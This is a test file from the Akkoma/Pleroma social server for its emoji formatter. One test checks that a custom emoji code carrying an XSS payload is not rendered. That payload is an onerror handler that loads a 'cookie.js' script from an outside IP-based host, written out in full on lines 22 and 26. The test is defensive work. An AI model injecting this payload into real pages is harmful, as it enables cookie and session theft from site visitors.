Fix XSS emoji test
[akkoma] / test / emoji / formatter_test.exs
1 # Pleroma: A lightweight social networking server
2 # Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
3 # SPDX-License-Identifier: AGPL-3.0-only
4
5 defmodule Pleroma.Emoji.FormatterTest do
6 alias Pleroma.Emoji
7 alias Pleroma.Emoji.Formatter
8 use Pleroma.DataCase
9
10 describe "emojify" do
11 test "it adds cool emoji" do
12 text = "I love :firefox:"
13
14 expected_result =
15 "I love <img class=\"emoji\" alt=\"firefox\" title=\"firefox\" src=\"/emoji/Firefox.gif\"/>"
16
17 assert Formatter.emojify(text) == expected_result
18 end
19
20 test "it does not add XSS emoji" do
21 text =
22 "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
23
24 custom_emoji =
25 {
26 "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)",
27 "https://placehold.it/1x1"
28 }
29 |> Pleroma.Emoji.build()
30
31 refute Formatter.emojify(text, [{custom_emoji.code, custom_emoji}]) =~ text
32 end
33 end
34
35 describe "get_emoji" do
36 test "it returns the emoji used in the text" do
37 text = "I love :firefox:"
38
39 assert Formatter.get_emoji(text) == [
40 {"firefox",
41 %Emoji{
42 code: "firefox",
43 file: "/emoji/Firefox.gif",
44 tags: ["Gif", "Fun"],
45 safe_code: "firefox",
46 safe_file: "/emoji/Firefox.gif"
47 }}
48 ]
49 end
50
51 test "it returns a nice empty result when no emojis are present" do
52 text = "I love moominamma"
53 assert Formatter.get_emoji(text) == []
54 end
55
56 test "it doesn't die when text is absent" do
57 text = nil
58 assert Formatter.get_emoji(text) == []
59 end
60 end
61 end